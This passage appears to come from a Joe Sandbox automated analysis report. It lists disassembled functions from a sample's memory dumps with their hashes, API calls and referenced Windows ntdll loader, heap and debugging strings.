                                                                                                                                                              • Opcode ID: 724edec358f2f41a1d8b2e1c973ed9c8748d8b2567d1867b73260787005ea862
                                                                                                                                                              • Instruction ID: 6bdbf4cad4e37bd7c73d14c5b69e3c11c0b4df46002673f412cfc2a151788784
                                                                                                                                                              • Opcode Fuzzy Hash: 724edec358f2f41a1d8b2e1c973ed9c8748d8b2567d1867b73260787005ea862
                                                                                                                                                              • Instruction Fuzzy Hash: 88E06DB1204204BBD610EE59EC42EAB77ACEFC5710F40401AF908A7241C670BD108BB8
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004287B3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ExitProcess.KERNEL32(?,00000000,?,?,4CF2BAE6,?,?,4CF2BAE6), ref: 004287E7
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1791548319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_WrrCV4QR2J.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ExitProcess
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 621844428-0
                                                                                                                                                              • Opcode ID: 5f2d11c3415c3880341c2dde1694300776f6da084e27cb50d6fd970313eaf6a5
                                                                                                                                                              • Instruction ID: a70d2caf07bf9b91732c47b13bc5c2eba1b16618381eb4ebddd6603121694906
                                                                                                                                                              • Opcode Fuzzy Hash: 5f2d11c3415c3880341c2dde1694300776f6da084e27cb50d6fd970313eaf6a5
                                                                                                                                                              • Instruction Fuzzy Hash: 0AE04F712442547BD220AA6AEC41FD7776CDBC5754F40411AFA18A7282C6707A058BE4
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015B2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: e6b76d64412c5bfe4f6bb0134032b84f7737154d6578656048a2e75d2017c16f
                                                                                                                                                              • Instruction ID: d35ac87b7e2c0a6c3decedb57c13010fd640b807464c18b27c0591a049cac35f
                                                                                                                                                              • Opcode Fuzzy Hash: e6b76d64412c5bfe4f6bb0134032b84f7737154d6578656048a2e75d2017c16f
                                                                                                                                                              • Instruction Fuzzy Hash: 56B09B719015C5D9DA11E7A54A0871B7A4077D0711F29C465D2030A41F4779D5D1E275
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Non-executed Functions

                                                                                                                                                              Function 01628D10 Relevance: 37.8, Strings: 30, Instructions: 268COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • *** enter .exr %p for the exception record, xrefs: 01628FA1
                                                                                                                                                              • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01628FEF
                                                                                                                                                              • The critical section is owned by thread %p., xrefs: 01628E69
                                                                                                                                                              • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01628DC4
                                                                                                                                                              • <unknown>, xrefs: 01628D2E, 01628D81, 01628E00, 01628E49, 01628EC7, 01628F3E
                                                                                                                                                              • write to, xrefs: 01628F56
                                                                                                                                                              • *** A stack buffer overrun occurred in %ws:%s, xrefs: 01628DA3
                                                                                                                                                              • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01628DB5
                                                                                                                                                              • *** Resource timeout (%p) in %ws:%s, xrefs: 01628E02
                                                                                                                                                              • *** Inpage error in %ws:%s, xrefs: 01628EC8
                                                                                                                                                              • *** An Access Violation occurred in %ws:%s, xrefs: 01628F3F
                                                                                                                                                              • The instruction at %p referenced memory at %p., xrefs: 01628EE2
                                                                                                                                                              • a NULL pointer, xrefs: 01628F90
                                                                                                                                                              • *** enter .cxr %p for the context, xrefs: 01628FBD
                                                                                                                                                              • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01628E3F
                                                                                                                                                              • *** then kb to get the faulting stack, xrefs: 01628FCC
                                                                                                                                                              • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01628F26
                                                                                                                                                              • The resource is owned exclusively by thread %p, xrefs: 01628E24
                                                                                                                                                              • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01628E86
                                                                                                                                                              • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01628F2D
                                                                                                                                                              • The instruction at %p tried to %s , xrefs: 01628F66
                                                                                                                                                              • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01628DD3
                                                                                                                                                              • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01628F34
                                                                                                                                                              • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 01628E4B
                                                                                                                                                              • read from, xrefs: 01628F5D, 01628F62
                                                                                                                                                              • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 01628D8C
                                                                                                                                                              • The resource is owned shared by %d threads, xrefs: 01628E2E
                                                                                                                                                              • an invalid address, %p, xrefs: 01628F7F
                                                                                                                                                              • Go determine why that thread has not released the critical section., xrefs: 01628E75
                                                                                                                                                              • This failed because of error %Ix., xrefs: 01628EF6
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                                                                                              • API String ID: 0-108210295
                                                                                                                                                              • Opcode ID: 341fd07316521170b05c0fe615a1af28ee5c7674d085e1cb334a02f987bd548b
                                                                                                                                                              • Instruction ID: f7d295a8b0fe4e0b8f091782049e567eddbd7d09a0ebe96a103c2f2a3286542d
                                                                                                                                                              • Opcode Fuzzy Hash: 341fd07316521170b05c0fe615a1af28ee5c7674d085e1cb334a02f987bd548b
                                                                                                                                                              • Instruction Fuzzy Hash: 6B81D37AA40621BFDB219B19CC45D6A3B7EFFA6B50F05404DF2086F352E3758811DAA2
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015F2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                                                              • API String ID: 0-2160512332
                                                                                                                                                              • Opcode ID: 011d27344f96de7c59f53af6931e4dd74978446d36baccfa7b182809d17a17c5
                                                                                                                                                              • Instruction ID: b25ce205debfad39d99aad3f1168c2a25a0215d135cbcd7e9419170ecfe1c95f
                                                                                                                                                              • Opcode Fuzzy Hash: 011d27344f96de7c59f53af6931e4dd74978446d36baccfa7b182809d17a17c5
                                                                                                                                                              • Instruction Fuzzy Hash: 5E927DB1608742AFE721DE29C880B6BB7E8BB84754F04491DFB95DF291D770E844CB92
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015A8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • Critical section address, xrefs: 015E5425, 015E54BC, 015E5534
                                                                                                                                                              • 8, xrefs: 015E52E3
                                                                                                                                                              • undeleted critical section in freed memory, xrefs: 015E542B
                                                                                                                                                              • Critical section debug info address, xrefs: 015E541F, 015E552E
                                                                                                                                                              • Address of the debug info found in the active list., xrefs: 015E54AE, 015E54FA
                                                                                                                                                              • corrupted critical section, xrefs: 015E54C2
                                                                                                                                                              • Invalid debug info address of this critical section, xrefs: 015E54B6
                                                                                                                                                              • double initialized or corrupted critical section, xrefs: 015E5508
                                                                                                                                                              • Thread identifier, xrefs: 015E553A
                                                                                                                                                              • Critical section address., xrefs: 015E5502
                                                                                                                                                              • Thread is in a state in which it cannot own a critical section, xrefs: 015E5543
                                                                                                                                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015E54CE
                                                                                                                                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015E54E2
                                                                                                                                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015E540A, 015E5496, 015E5519
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                                              • API String ID: 0-2368682639
                                                                                                                                                              • Opcode ID: 0c938c820caa291cb367b3d21178b6bce8c9776948e64a8eecc86b39412e4a9f
                                                                                                                                                              • Instruction ID: 241299a6678175fd8373dccdedd796a929479679095eecb2edf93ca5afaa7149
                                                                                                                                                              • Opcode Fuzzy Hash: 0c938c820caa291cb367b3d21178b6bce8c9776948e64a8eecc86b39412e4a9f
                                                                                                                                                              • Instruction Fuzzy Hash: EE818C75E40349EFEB64CF9ACC45BAEBBF5BB48708F10415AE905BB251D371A940CB60
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015A29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • RtlpResolveAssemblyStorageMapEntry, xrefs: 015E261F
                                                                                                                                                              • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 015E22E4
                                                                                                                                                              • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 015E24C0
                                                                                                                                                              • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 015E2409
                                                                                                                                                              • @, xrefs: 015E259B
                                                                                                                                                              • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 015E2498
                                                                                                                                                              • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 015E2506
                                                                                                                                                              • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 015E2412
                                                                                                                                                              • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 015E25EB
                                                                                                                                                              • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 015E2602
                                                                                                                                                              • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 015E2624
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                                                              • API String ID: 0-4009184096
                                                                                                                                                              • Opcode ID: 764e19e2d73d2d836fbee85357f5cf308314e5618436e46d099df889175abae5
                                                                                                                                                              • Instruction ID: 4b1f9aeb06473279bfe83a8c462fd1ef0ab7417f0b56303831a8436c4a4c1b5e
                                                                                                                                                              • Opcode Fuzzy Hash: 764e19e2d73d2d836fbee85357f5cf308314e5618436e46d099df889175abae5
                                                                                                                                                              • Instruction Fuzzy Hash: 2C0270F1D402299BDB35DB54CC85BDEB7B8BB54304F4045DAA609AB241EB30AE84CF69
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 01618B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                                              • API String ID: 0-2515994595
                                                                                                                                                              • Opcode ID: ea785d100ce92043ce4c4bd4d6abfdb9aefbf1347f56a33a18b2a87607be0a02
                                                                                                                                                              • Instruction ID: 87c1d1663bac6bec3ee35230f7c155c1534f9813ffde389b7462ab97b5046ce7
                                                                                                                                                              • Opcode Fuzzy Hash: ea785d100ce92043ce4c4bd4d6abfdb9aefbf1347f56a33a18b2a87607be0a02
                                                                                                                                                              • Instruction Fuzzy Hash: 5951C0B16043469BD725CF188C84BABBBECFFD8244F58491DE959C7245E770D604CB92
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0158AD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                                                                                              • API String ID: 0-3197712848
                                                                                                                                                              • Opcode ID: 9ba8d53a7a139df9a9740d99d1e9a82502aeba817041008c7b2ba4b39a6110b7
                                                                                                                                                              • Instruction ID: db21ef4409bede2d4ced7bac40ca8a79f0d695659d2644d2e1eca26edc51895b
                                                                                                                                                              • Opcode Fuzzy Hash: 9ba8d53a7a139df9a9740d99d1e9a82502aeba817041008c7b2ba4b39a6110b7
                                                                                                                                                              • Instruction Fuzzy Hash: 7612C0716093428FD725EF28C880BAEB7E4BF84714F04091EF995AF291E774D945CB92
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 01620274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                                              • API String ID: 0-1700792311
                                                                                                                                                              • Opcode ID: c3fcee1f6e5f90af117ea986db2be9a6a35840676594a46347c59d1dd4afd4c6
                                                                                                                                                              • Instruction ID: d76b99a89f96cb2a80ab47a7e5981cabce6b4bf9db8cfed55febf8acd91b1eab
                                                                                                                                                              • Opcode Fuzzy Hash: c3fcee1f6e5f90af117ea986db2be9a6a35840676594a46347c59d1dd4afd4c6
                                                                                                                                                              • Instruction Fuzzy Hash: 30D1CB31600AA6DFDB22DF68C840AADBBF5FF4A714F088059F845AB762C7359981CF54
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015F89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • VerifierDlls, xrefs: 015F8CBD
                                                                                                                                                              • AVRF: -*- final list of providers -*- , xrefs: 015F8B8F
                                                                                                                                                              • VerifierFlags, xrefs: 015F8C50
                                                                                                                                                              • VerifierDebug, xrefs: 015F8CA5
                                                                                                                                                              • HandleTraces, xrefs: 015F8C8F
                                                                                                                                                              • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 015F8A67
                                                                                                                                                              • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 015F8A3D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                                                              • API String ID: 0-3223716464
                                                                                                                                                              • Opcode ID: fe4eaea42bf017648a4fb532db397ba6f2e240bde908a0e3d69114b78ae3cb87
                                                                                                                                                              • Instruction ID: cd73c760ef5d27c187159b80006384c6d42345f698e75cacf1b222f9ff1c9d2a
                                                                                                                                                              • Opcode Fuzzy Hash: fe4eaea42bf017648a4fb532db397ba6f2e240bde908a0e3d69114b78ae3cb87
                                                                                                                                                              • Instruction Fuzzy Hash: E791FE72645706AFD722EF28CC81B1A7BE8BF94754F44485DFB82AF294D770AC0487A1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0157EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                                                              • API String ID: 0-1109411897
                                                                                                                                                              • Opcode ID: b8b78eb4dd29bc64bffa846a29dd23c5658e06f2e03582105186c2dfcd1bd82a
                                                                                                                                                              • Instruction ID: 8cc97e6b586e1f39ce5a34423638c811f1fa9b3b7d81dfa32b1e8e4f4ac2efb9
                                                                                                                                                              • Opcode Fuzzy Hash: b8b78eb4dd29bc64bffa846a29dd23c5658e06f2e03582105186c2dfcd1bd82a
                                                                                                                                                              • Instruction Fuzzy Hash: 6BA24574A0562A8FDB74CF18D8897ADBBB5BF85304F1446EAD919AB650DB309EC1CF00
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015A63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                                              • API String ID: 0-792281065
                                                                                                                                                              • Opcode ID: 7791e66feb0b42e49e1565ee4ddff3ee07cf2c2a4034fc5ce1a86e0d51b0ab0d
                                                                                                                                                              • Instruction ID: 94901ebf2f856241e2290d13982eecd1ed09c22e02e7e06a4e1707cd06cd74de
                                                                                                                                                              • Opcode Fuzzy Hash: 7791e66feb0b42e49e1565ee4ddff3ee07cf2c2a4034fc5ce1a86e0d51b0ab0d
                                                                                                                                                              • Instruction Fuzzy Hash: 3F912771E40312DBEB29DF58DC89BAE7BE1BB90B54F48002DD905AF291D7749801C7A4
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0156645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • Getting the shim engine exports failed with status 0x%08lx, xrefs: 015C9A01
                                                                                                                                                              • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 015C9A2A
                                                                                                                                                              • LdrpInitShimEngine, xrefs: 015C99F4, 015C9A07, 015C9A30
                                                                                                                                                              • apphelp.dll, xrefs: 01566496
                                                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015C9A11, 015C9A3A
                                                                                                                                                              • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 015C99ED
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                              • API String ID: 0-204845295
                                                                                                                                                              • Opcode ID: 542b1e100f1d4ca7e4f30b5e07568b6b945411098c43e1f8d0d31b3b682bb14e
                                                                                                                                                              • Instruction ID: 0ccce4e2c2b9a833830851b969d792f4b6cc6aec97de655e0368fffea90baa6b
                                                                                                                                                              • Opcode Fuzzy Hash: 542b1e100f1d4ca7e4f30b5e07568b6b945411098c43e1f8d0d31b3b682bb14e
                                                                                                                                                              • Instruction Fuzzy Hash: FC5190712183059FD724DF68CC52BAB77E8FB84B48F40091EF5859F260D6B0E944CB92
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015A2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              • RtlGetAssemblyStorageRoot, xrefs: 015E2160, 015E219A, 015E21BA
                                                                                                                                                              • SXS: %s() passed the empty activation context, xrefs: 015E2165
                                                                                                                                                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 015E219F
                                                                                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 015E2180
                                                                                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 015E2178
                                                                                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 015E21BF
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                                              • API String ID: 0-861424205
                                                                                                                                                              • Opcode ID: 608ca0020e479c0a177762c2f48be8ba633cd97901dc957d4da8f1231eed2ed0
                                                                                                                                                              • Instruction ID: 83017e47a279426fe145982f33dfeed7e860016f4314dff385ee3f56e0d3b5ad
                                                                                                                                                              • Opcode Fuzzy Hash: 608ca0020e479c0a177762c2f48be8ba633cd97901dc957d4da8f1231eed2ed0
                                                                                                                                                              • Instruction Fuzzy Hash: D031073AF80215B7E7298A998C46F5E7BB9FB95A50F45005EFB04AF244D270DB00C7A1
